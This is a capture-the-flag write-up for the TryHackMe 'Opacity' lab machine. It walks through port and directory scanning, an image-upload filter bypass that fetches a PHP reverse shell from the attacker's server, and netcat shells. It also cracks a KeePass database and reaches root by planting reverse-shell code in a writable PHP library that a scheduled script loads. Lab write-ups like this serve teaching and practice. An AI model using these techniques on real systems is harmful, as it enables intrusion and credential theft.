# THM - Opacity

## Nmap

```bash
nmap -sC -sV -oN nmap.initial 10.10.182.169
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-22 07:48 EDT
Nmap scan report for 10.10.182.169
Host is up (0.070s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
|   256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
|_  256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time: 
|   date: 2023-09-22T11:48:34
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.95 seconds
```

## Running GoBuster

```bash
gobuster dir -u http://10.10.209.78 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.scan
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.209.78
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/09/27 01:01:01 Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 310] [--> http://10.10.209.78/css/]
/cloud                (Status: 301) [Size: 312] [--> http://10.10.209.78/cloud/]
```

## Trying to upload a malicious file

First, i will try to upload a php reverse shell. 

I start my python web server and put this external URL : `http://10.8.17.62:8000/shell.php` 

But got this following message : `Please select an image`

Ok, the upload is restricted to only images extension. We need to find a bypass to upload a php reverse shell.

I found this cheatsheet **https://book.hacktricks.xyz/pentesting-web/file-upload** after trying lot of bypass

This one works : `http://10.8.17.62:8000/shell.php#.png` 

Then go on this url to trigger our reverser shell : `http://10.10.209.78/cloud/images/shell.php#.png`

## Initial Access

```bash
nc -lvnp 1234                                 
listening on [any] 1234 ...
connect to [10.8.17.62] from (UNKNOWN) [10.10.209.78] 47488
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Spawning a TTY shell

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

## Running Linpeas

After a long time to read in details the linepeas output, i found this file `dataset.kdbx` in `/opt` 

Let's download this one. And then, use keepass2john to get the hash to crack

```bash
keepass2john dataset.kdbx > dataset.kbdx.hash
```

## Cracking the password of keepass dataset 

```bash
john dataset.kbdx.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (dataset)     
1g 0:00:00:23 DONE (2023-09-27 01:41) 0.04258g/s 37.13p/s 37.13c/s 37.13C/s chichi..walter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Yeah, we got the password : `741852963`

Need to open the dataset with keypass app and got username and password :

| username | password |
| -------- | -------- |
| sysadmin | Cl0udP4ss40p4city#8700 |

Cool we can log by SSH with these creds.


## PrivEsc to root

See an `scripts` directory that contain an php script

```
<?php

//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;

//Files scheduled removal
$dir = "/var/www/html/cloud/images";
if(file_exists($dir)){
    $di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
    $ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
    foreach ( $ri as $file ) {
        $file->isDir() ?  rmdir($file) : unlink($file);
    }
}
?>
```

There is also an `lib` directory that contain multiple php library (i guess). And we can write in this one. Let's try to replace the content of the file `lib/backup.inc.php` with php reverse shell code. To do this we need to delete `lib/backup.inc.php` and recreate that file with malicious code.

start an nc listener, wait a minute. Annnnd we'rrr root ! :D

```
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.8.17.62] from (UNKNOWN) [10.10.190.140] 60712
# id
uid=0(root) gid=0(root) groups=0(root)
```


